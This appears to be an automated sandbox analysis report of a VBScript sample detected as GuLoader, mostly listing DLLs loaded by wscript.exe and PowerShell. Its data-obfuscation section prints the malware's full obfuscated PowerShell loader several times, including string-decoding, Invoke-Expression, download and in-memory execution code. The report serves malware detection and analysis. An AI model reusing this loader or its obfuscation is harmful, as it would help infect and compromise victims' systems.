              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: aqm.Core.pdbZ source: powershell.exe, 00000006.00000002.3346493152.0000000007103000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.3346493152.0000000007030000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decolori", "0")
              Yara detected GuLoader
              Source: Yara matchFile source: 00000006.00000002.3353948398.000000000C936000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3353773662.00000000084D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3340409959.0000000005886000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2187936200.0000028025C7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Regnskabsprincippers)$GLObaL:TIlskReRsAkSenES77 = [SYSTEm.Text.ENCODiNG]::ASCII.GEtstRing($PeAChLiKe)$GloBAl:unTUFted=$TILskrersAkSEnEs77.sUBstRiNG($soliDare,$pOlYadelPH)<#Undwelt Sl
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Flames $Lbetjmorinens $Traditionalismen), (Rumina @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Etnografen = [AppDomain]::CurrentDomain.GetAssemblies()$g
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Misally)), $Serviceprisernes200).DefineDynamicModule($Campward7, $false).DefineType($Fingerspidsfornemmelserne, $Troldmandsorganisatio
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Regnskabsprincippers)$GLObaL:TIlskReRsAkSenES77 = [SYSTEm.Text.ENCODiNG]::ASCII.GEtstRing($PeAChLiKe)$GloBAl:unTUFted=$TILskrersAkSEnEs77.sUBstRiNG($soliDare,$pOlYadelPH)<#Undwelt Sl
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decoloriser Quatrains dksmands Rentabelt #>;$Stvregne=$Orlos+$host.UI; function Udgangstilladelsernes($Lupulus){If ($Stvregne) {$setaria++;}$Revest=$Velkomstens74+$Lupulus.'Length'-$setaria; for( $Kropsvisiteret=4;$Kropsvisiteret -lt $Revest;$Kropsvisiteret+=5){$Spoilage=$Kropsvisiteret;$Salvelsesfuldest+=$Lupulus[$Kropsvisiteret];$Prototraitor='Kronvildtjagterne';}$Salvelsesfuldest;}function Skilleliniens($Knothead){ & ($Toilettaskens) ($Knothead);}$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal I clvotaaDavi/ Pen ';$Tastetryk+=Udgangstilladelsernes 'Quar5Skyd.mine0Love Ski.(Li nWFejliMul nFabrdudklo NanwF.ans a,a ProcNB,geT,lie Stem1Udru0 Dr,.Roug0Raci;Phra OffiWCensiRiddnNatu6Oakl4Be i;Ne.r FenaxOver6Ea t4Ur n;Nume UrinrGyptvFili:sta,1 Eff3Dest1Clee.Disa0Tred)Fi a HandG noneYellcJustk Siso,rep/Frod2 Sto0H.ms1Stil0Gest0 P.o1Cert0Wi t1Buri DyreFSelviDubbr G,ueH,mpf tr oUmorxL,du/Defl1conv3Post1N ws.Sikk0 Bog ';$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';$Konstruktivt=Udgangstilladelsernes 'Gru.haf,at ArttB depKachsHoo,:Flit/Be.a/ GamsBatiyH lvnDeuteMa ipFinu.Fl trTohaoBef./SkosLQuacySpecsActib trgaSandd vov. PaupStr sS,anpSkij ';$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';$Toilettaskens=Udgangstilladelsernes ' ympI .ree Sa.x Raf ';$Lykkejgers='Spendynr';$Proconscriptive='\Udviklingsegnes.sep';Skilleliniens (Udgangstilladelsernes ' npa$Fuyeg Cu le,acoNaivbFinaAAkvaLTr,n:O.lltCytoAIdeamFra B Ud UUn,rRChicSBlse=Ozon$ kreSkanNP lwvGlas: staA St PWordP La D AliASn.wt P.laU,fr+trau$frynpGnisr ,enoAppecDuelO.enenKgeusF.rhC r nrOarliclump FleTswo iLym.vRefeETysk ');Skilleliniens (Udgangstilladelsernes 'Arbe$Forbg PenlHandoMinuBFackaLa sL Bil: UnmKgardOIndod eneELan k aresA skEK.ogrOml.=Bajo$Kl pknarcoCraiNSy gSChert PrerUnusUPr.lKPrint s aI ealvsammTAkti.AnidsChe,pThyml N nIOpe.TTrun(Hoo $svinkUn.orChecO no pTilfS F,rVSvinifadeS .ryiBeriTStroeAntiR .elEnoncTskifN FerDForpa.ildRGipsBSan eDampj ForDMelaEJor 9Disi7Insi)Star ');Skilleliniens (Udgangstilladelsernes ' Nov[,ufonfjldE RovtEjen.SextshunkE Marr Genv .kki C,nCDi heBronP,kspoGadiIFrowNtndit,algMInf AEkspNVeneABallg UngeFastr Gre]Wa.r:U,co: molSApplE KogC ,unuAnteRReaniDm,iT CarYKrafp E.er nheoGardtLauroTahacCivioNighLLump Rang=Outb ,usk[ StaN A.hE Ovet Wif.GcelSFormeBondc,andUS ilRArtoI ukkTToroYParoPdolorSubpOPreitcheeoFrieCSrskOLserl OddTunfoYD ospSkypeEksp]Sg f: amm:Dry,tPomeLaddos nab1Dila2 le ');$Konstruktivt=$Kodekser[0];$Slbemaalsflyvningens=(Udgangstilladelsernes 'Buat$,utwgVineLLs lO ,aaBMuriaGravLT.ia:up om TusEDrabsNondOPoluSDat.TRoofeSperTGarrHVir,i racuEmpimBol,= OstNAndre K sW Da -S orODefebNonpj phEFedeC N dTpara BadeSPermYLmleS enotfiltEPretmHj i. F rnWin eMar.T Rec. llewPosteAgnobKarmcu
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decoloriser Quatrains dksmands Rentabelt #>;$Stvregne=$Orlos+$host.UI; function Udgangstilladelsernes($Lupulus){If ($Stvregne) {$setaria++;}$Revest=$Velkomstens74+$Lupulus.'Length'-$setaria; for( $Kropsvisiteret=4;$Kropsvisiteret -lt $Revest;$Kropsvisiteret+=5){$Spoilage=$Kropsvisiteret;$Salvelsesfuldest+=$Lupulus[$Kropsvisiteret];$Prototraitor='Kronvildtjagterne';}$Salvelsesfuldest;}function Skilleliniens($Knothead){ & ($Toilettaskens) ($Knothead);}$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal I clvotaaDavi/ Pen ';$Tastetryk+=Udgangstilladelsernes 'Quar5Skyd.mine0Love Ski.(Li nWFejliMul nFabrdudklo NanwF.ans a,a ProcNB,geT,lie Stem1Udru0 Dr,.Roug0Raci;Phra OffiWCensiRiddnNatu6Oakl4Be i;Ne.r FenaxOver6Ea t4Ur n;Nume UrinrGyptvFili:sta,1 Eff3Dest1Clee.Disa0Tred)Fi a HandG noneYellcJustk Siso,rep/Frod2 Sto0H.ms1Stil0Gest0 P.o1Cert0Wi t1Buri DyreFSelviDubbr G,ueH,mpf tr oUmorxL,du/Defl1conv3Post1N ws.Sikk0 Bog ';$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';$Konstruktivt=Udgangstilladelsernes 'Gru.haf,at ArttB depKachsHoo,:Flit/Be.a/ GamsBatiyH lvnDeuteMa ipFinu.Fl trTohaoBef./SkosLQuacySpecsActib trgaSandd vov. PaupStr sS,anpSkij ';$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';$Toilettaskens=Udgangstilladelsernes ' ympI .ree Sa.x Raf ';$Lykkejgers='Spendynr';$Proconscriptive='\Udviklingsegnes.sep';Skilleliniens (Udgangstilladelsernes ' npa$Fuyeg Cu le,acoNaivbFinaAAkvaLTr,n:O.lltCytoAIdeamFra B Ud UUn,rRChicSBlse=Ozon$ kreSkanNP lwvGlas: staA St PWordP La D AliASn.wt P.laU,fr+trau$frynpGnisr ,enoAppecDuelO.enenKgeusF.rhC r nrOarliclump FleTswo iLym.vRefeETysk ');Skilleliniens (Udgangstilladelsernes 'Arbe$Forbg PenlHandoMinuBFackaLa sL Bil: UnmKgardOIndod eneELan k aresA skEK.ogrOml.=Bajo$Kl pknarcoCraiNSy gSChert PrerUnusUPr.lKPrint s aI ealvsammTAkti.AnidsChe,pThyml N nIOpe.TTrun(Hoo $svinkUn.orChecO no pTilfS F,rVSvinifadeS .ryiBeriTStroeAntiR .elEnoncTskifN FerDForpa.ildRGipsBSan eDampj ForDMelaEJor 9Disi7Insi)Star ');Skilleliniens (Udgangstilladelsernes ' Nov[,ufonfjldE RovtEjen.SextshunkE Marr Genv .kki C,nCDi heBronP,kspoGadiIFrowNtndit,algMInf AEkspNVeneABallg UngeFastr Gre]Wa.r:U,co: molSApplE KogC ,unuAnteRReaniDm,iT CarYKrafp E.er nheoGardtLauroTahacCivioNighLLump Rang=Outb ,usk[ StaN A.hE Ovet Wif.GcelSFormeBondc,andUS ilRArtoI ukkTToroYParoPdolorSubpOPreitcheeoFrieCSrskOLserl OddTunfoYD ospSkypeEksp]Sg f: amm:Dry,tPomeLaddos nab1Dila2 le ');$Konstruktivt=$Kodekser[0];$Slbemaalsflyvningens=(Udgangstilladelsernes 'Buat$,utwgVineLLs lO ,aaBMuriaGravLT.ia:up om TusEDrabsNondOPoluSDat.TRoofeSperTGarrHVir,i racuEmpimBol,= OstNAndre K sW Da -S orODefebNonpj phEFedeC N dTpara BadeSPermYLmleS enotfiltEPretmHj i. F rnWin eMar.T Rec. llewPosteAgnobKarmcu
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decoloriser Quatrains dksmands Rentabelt #>;$Stvregne=$Orlos+$host.UI; function Udgangstilladelsernes($Lupulus){If ($Stvregne) {$setaria++;}$Revest=$Velkomstens74+$Lupulus.'Length'-$setaria; for( $Kropsvisiteret=4;$Kropsvisiteret -lt $Revest;$Kropsvisiteret+=5){$Spoilage=$Kropsvisiteret;$Salvelsesfuldest+=$Lupulus[$Kropsvisiteret];$Prototraitor='Kronvildtjagterne';}$Salvelsesfuldest;}function Skilleliniens($Knothead){ & ($Toilettaskens) ($Knothead);}$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal I clvotaaDavi/ Pen ';$Tastetryk+=Udgangstilladelsernes 'Quar5Skyd.mine0Love Ski.(Li nWFejliMul nFabrdudklo NanwF.ans a,a ProcNB,geT,lie Stem1Udru0 Dr,.Roug0Raci;Phra OffiWCensiRiddnNatu6Oakl4Be i;Ne.r FenaxOver6Ea t4Ur n;Nume UrinrGyptvFili:sta,1 Eff3Dest1Clee.Disa0Tred)Fi a HandG noneYellcJustk Siso,rep/Frod2 Sto0H.ms1Stil0Gest0 P.o1Cert0Wi t1Buri DyreFSelviDubbr G,ueH,mpf tr oUmorxL,du/Defl1conv3Post1N ws.Sikk0 Bog ';$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';$Konstruktivt=Udgangstilladelsernes 'Gru.haf,at ArttB depKachsHoo,:Flit/Be.a/ GamsBatiyH lvnDeuteMa ipFinu.Fl trTohaoBef./SkosLQuacySpecsActib trgaSandd vov. PaupStr sS,anpSkij ';$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';$Toilettaskens=Udgangstilladelsernes ' ympI .ree Sa.x Raf ';$Lykkejgers='Spendynr';$Proconscriptive='\Udviklingsegnes.sep';Skilleliniens (Udgangstilladelsernes ' npa$Fuyeg Cu le,acoNaivbFinaAAkvaLTr,n:O.lltCytoAIdeamFra B Ud UUn,rRChicSBlse=Ozon$ kreSkanNP lwvGlas: staA St PWordP La D AliASn.wt P.laU,fr+trau$frynpGnisr ,enoAppecDuelO.enenKgeusF.rhC r nrOarliclump FleTswo iLym.vRefeETysk ');Skilleliniens (Udgangstilladelsernes 'Arbe$Forbg PenlHandoMinuBFackaLa sL Bil: UnmKgardOIndod eneELan k aresA skEK.ogrOml.=Bajo$Kl pknarcoCraiNSy gSChert PrerUnusUPr.lKPrint s aI ealvsammTAkti.AnidsChe,pThyml N nIOpe.TTrun(Hoo $svinkUn.orChecO no pTilfS F,rVSvinifadeS .ryiBeriTStroeAntiR .elEnoncTskifN FerDForpa.ildRGipsBSan eDampj ForDMelaEJor 9Disi7Insi)Star ');Skilleliniens (Udgangstilladelsernes ' Nov[,ufonfjldE RovtEjen.SextshunkE Marr Genv .kki C,nCDi heBronP,kspoGadiIFrowNtndit,algMInf AEkspNVeneABallg UngeFastr Gre]Wa.r:U,co: molSApplE KogC ,unuAnteRReaniDm,iT CarYKrafp E.er nheoGardtLauroTahacCivioNighLLump Rang=Outb ,usk[ StaN A.hE Ovet Wif.GcelSFormeBondc,andUS ilRArtoI ukkTToroYParoPdolorSubpOPreitcheeoFrieCSrskOLserl OddTunfoYD ospSkypeEksp]Sg f: amm:Dry,tPomeLaddos nab1Dila2 le ');$Konstruktivt=$Kodekser[0];$Slbemaalsflyvningens=(Udgangstilladelsernes 'Buat$,utwgVineLLs lO ,aaBMuriaGravLT.ia:up om TusEDrabsNondOPoluSDat.TRoofeSperTGarrHVir,i racuEmpimBol,= OstNAndre K sW Da -S orODefebNonpj phEFedeC N dTpara BadeSPermYLmleS enotfiltEPretmHj i. F rnWin eMar.T Rec. llewPosteAgnobKarmcuJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848BD09D8 push E85DB45Dh; ret 4_2_00007FF848BD09F9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848BD8555 pushad ; ret 4_2_00007FF848BD850D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848BD8555 push eax; ret 4_2_00007FF848BD851D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848BD24FA pushad ; ret 4_2_00007FF848BD850D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848BD850E push eax; ret 4_2_00007FF848BD851D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848BD82E9 pushad ; ret 4_2_00007FF848BD850D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848BD1AA5 push es; retf 4_2_00007FF848BD1ABA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848BD00BD pushad ; iretd 4_2_00007FF848BD00C1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0456C890 pushfd ; ret 6_2_0456C899
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0456B631 push esp; iretd 6_2_0456B63D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0456371F push esp; iretd 6_2_04563759
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
